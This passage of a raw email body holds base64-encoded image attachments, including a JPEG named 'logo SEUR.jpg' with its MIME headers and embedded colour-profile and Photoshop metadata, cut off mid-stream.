AAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAA AAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAA AAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAALFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBp biBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxSZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4g SUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDP FAAD7cwABBMLAANcngAAAAFYWVogAAAAAABMCVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAA AAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JUIGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMA KAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBoAG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCy ALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA+wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIB WQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4 AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYCwQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oD ZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQGBBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATT BOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYFpgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowG nQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeGB5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiq CL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJzwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsL Igs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxcDHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3e DfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EPXg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPUR ExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKjEsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSL FK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkWbBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUY ihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzM HPUdHh1HHXAdmR3DHeweFh5AHmoelB6+HukfEx8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUh oSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPwJB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3 JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgpaymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDks biyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8kL1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJj Mpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5 BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76DwnPGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/i QCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpDfUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVH e0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsMS1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9J T5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNTX1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX 4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvlXDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2Cq YPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOllPWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFq SGqfavdrT2una/9sV2yvbQhtYG25bhJua27Ebx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQU dHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+ wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZ if6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6PNo+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSV X5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrVm0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFH obaiJqKWowajdqPmpFakx6U4pammGqaLpv2nbqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1Erbiu La6hrxavi7AAsHWw6rFgsdayS7LCszizrrQltJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsu u6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJ Osm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+40DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc 1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hzeot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3m lucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe 9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9uv5L/tz/bf///+4ADkFkb2JlAGSAAAAAAf/bAIQA EAsLCwwLEAwMEBcPDQ8XGxQQEBQbHxcXFxcXHxEMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwM DAwMDAwMDAERDw8RExEVEhIVFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwMDBEMDAwMDAwMDAwMDAwM DAwMDAwMDAwMDAwMDAwM/8AAEQgBHwDtAwEiAAIRAQMRAf/dAAQAD//EAKUAAAEFAQEAAAAAAAAA AAAAAAABAgMEBQYHAQEBAQEBAAAAAAAAAAAAAAAAAQIDBBAAAQMCAwQECAoIBAYDAQAAAQACAxEE IRIFMSITBkFRMkJhcVJiciNDFIGRsZKissIzUyShgtJjc4MVB9GTwzTB4qOz0xZEVHQ1EQEBAAIB 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 ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="logo SEUR.jpg" Content-Transfer-Encoding: base64 Content-ID: <002001c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEASABIAAD/7QrwUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAASAAAAAEA AgBIAAAAAQACOEJJTQQNAAAAAAAEAAAAeDhCSU0D8wAAAAAACAAAAAAAAAAAOEJJTQQKAAAAAAAB AAA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9m ZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4 AAAAAABwAAD/////////////////////////////A+gAAAAA//////////////////////////// /wPoAAAAAP////////////////////////////8D6AAAAAD///////////////////////////// A+gAADhCSU0ECAAAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBBQAAAAAAAQAAAABOEJJTQQMAAAA AAlfAAAAAQAAAHAAAAAsAAABUAAAOcAAAAlDABgAAf/Y/+AAEEpGSUYAAQIBAEgASAAA/+4ADkFk b2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwMDAwRDAwMDAwM DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwM DBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgALABwAwEiAAIRAQMRAf/dAAQAB//E AT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAAAQACAwQFBgcI CQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVSwWIzNHKC0UMH JZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSltcXV5fVWZnaG lqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFRYXEiEwUygZEU obFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOEw9N14/NGlKSF tJXE1OT0pbXF1eX1VmZ2hpamtsbW5vYnN0dXZ3eHl6e3x//aAAwDAQACEQMRAD8A9VSSSSUpJJJJ Sklg/WP63YvQ76cMY9mZnZADq8erQ7S70m+4zufZZ7Kq62WPQejfXSnqGfZ07Mw7em5TKzZsuI4a Gve17SK7a3em/wBWvdX76k3jjfDerMOWzHGcggeADiv+qP0uH5uF6RAzH5NeO+zGYLLWe4Vun3Af SY3b+ft+guWxvr/kZbS/G6RbawGN7bJH/nr2/wBpXHfW3IDKB+zj9pvJnHNsOa02fZse126r6GS+ u/b/AMUhHNDe7pdPkuYjoYcJOnzQ/wC+Wu+sueKPVpppO2C4OLvoHTfPt27HfS/rqg766dV4FGO0 ke0u3kT+bPvb7fzUbq+ZhYXXaumVY9mVdmOa5wa9rWM9cmvY5r2P3M21XXP/AHGLnLuo9MsORZRh 